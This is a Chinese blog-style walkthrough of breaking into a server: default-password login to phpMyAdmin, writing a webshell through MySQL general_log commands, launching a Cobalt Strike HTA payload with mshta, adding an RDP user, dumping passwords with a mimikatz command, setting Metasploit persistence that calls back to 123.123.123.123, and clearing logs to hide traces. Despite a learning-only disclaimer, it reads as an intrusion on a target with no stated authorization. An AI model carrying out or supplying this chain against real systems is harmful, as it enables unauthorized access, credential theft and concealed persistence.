温馨提示
本文章仅供学习交流使用,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
通过对目标站点的扫描获取信息,发现开放8081端口
对应web服务为phpmyadmin,这种页面我能想到的只有弱口令和空密码了 奈何本人太菜了
试了下弱口令root 我进去了 默认密码,有什么好说的
进了这里首先想到通过日志写shell
前提:
1.Root数据库用户(root权限)
2.网站绝对路径(确定有写入权限)
3.magic_quotes_gpc:Off(关闭)
一三项几乎不用管 一般你root账户登录进去都是很高的权限
剩下的就是找网站绝对路径 点击变量
这貌似也不能通过这个摸索出路径 只好找找其他地方
我这里使用了dirsearch尝试扫描改站目录,是否用探针文件泄露
扫描出了几个默认的探针名,以为要搞定了 结果访问一看是没有显示的
貌似没有搞 只有继续尝试下其他方法
这里扫出了tmp文件夹 访问下
继续访问
继续访问 报错了 成功爆出了网站路径
对比一下url 可以肯定 D:CodephpMyAdmin-4.9.0.1-all-languages
为网站绝对路径:
有了路径开始sql语句写webshell:
查看日志是否开启
代码语言:javascript复制show variables like ‘%general%';
开启日志
代码语言:javascript复制set global general_log = on;
设置日志路径
代码语言:javascript复制set global general_log_file = ‘/var/www/html/11111.php';
写上一句话
找到文件后 命令执行下 执行成功 拿到shell 开始下一步
webshell链接:
sy权限 不用提权
之后为了进行有效的内网渗透得想办法让目标上线MSF或者CS
这里我选择的上线CS
这里我选择的web application执行文件
生成恶意hta文件:
先查看下对面有没有AV
没有AV 奥利给
Copy恶意链接
终端mshta执行hta木马
成功上线
查看权限 sy
开放3389 不上远程的黑客不是好黑客
新建个用户YDT
提升权限
成功远程服务器
新建的用户桌面没有啥意思 得上线管理员的桌面才有意思 这里我上传个猕猴挑
通过命令
代码语言:javascript复制mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>C:programdata1.txt成功拿到管理员账户
管理员在线写代码可海星
为了世界被破坏 为了维护地球的和平 接下来再用msf做一个权限维持:
使用metasploit自带的H门进行权限维持
我这里用的persistence
command: run persistence -X -i 2 -p 8888 -r 123.123.123.123
-X指定启动的方式为开机自启动
-i反向连接的时间间隔(2s)
–r 指定攻击者的IP此时目标C盘已经生成了我们使用msf生成的vbs文件:
写入开机启动项:
收到权限维持后的metepreter:权限维持结束
准备开溜 把痕迹给清理了:
清除远程连接日志:
福利:
本文中使用的清除痕迹,日志的脚本,关注公众号回复wipe_log,即可获取
